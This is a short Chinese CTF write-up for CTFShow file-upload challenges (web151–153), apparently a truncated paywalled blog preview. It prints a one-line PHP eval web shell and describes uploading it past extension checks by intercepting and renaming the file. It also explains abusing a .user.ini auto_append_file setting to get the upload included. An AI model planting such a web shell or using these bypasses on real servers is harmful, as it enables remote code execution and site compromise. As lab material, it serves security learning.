目录
web151-web152
首先写一个一句哈:
<?php @eval($_POST["1"]);?>
然后修改文件后缀为png(题目限制),上传文件同时进行抓包,然后修改后缀php,然后蚁剑连接,找到flag



拿到flag~~~~
web153
使用.user.ini绕过
.user.ini
摘抄其他大佬的解释:
指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);这两个设置的区别只是在于auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)所以要求当前目录必须要有php文件
上传.user.ini内容为auto_append_file="xxx"
xxx为我们上传的文件名,这样在php文件上传了我们的木马文件
步骤:</

本文详细介绍了CTFShow中一系列Web安全挑战,包括利用.user.ini绕过、短标签、过滤字符绕过等技巧,涉及文件上传、命令执行及日志包含等漏洞利用方法,通过实例解析了如何一步步获取flag。
最低0.47元/天 解锁文章
724

被折叠的 条评论
为什么被折叠?



